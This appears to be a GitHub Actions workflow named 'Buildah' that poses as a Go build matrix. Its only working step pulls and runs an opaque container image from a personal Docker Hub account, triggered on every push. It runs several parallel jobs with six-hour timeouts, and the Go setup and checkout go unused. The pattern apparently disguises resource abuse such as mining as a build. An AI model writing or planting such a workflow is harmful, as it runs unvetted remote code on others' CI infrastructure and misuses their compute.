name: Buildah
on: 
  push:

jobs:
  build:
    name: dresa
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 256
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4,]
        flag: [A, B]
    timeout-minutes: 360
    env:
        NUM_JOBS: 256
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: runner_go
      run: |
        docker pull docker.io/alekpoden82/aufal-marom:latest && docker run docker.io/alekpoden82/aufal-marom:latest
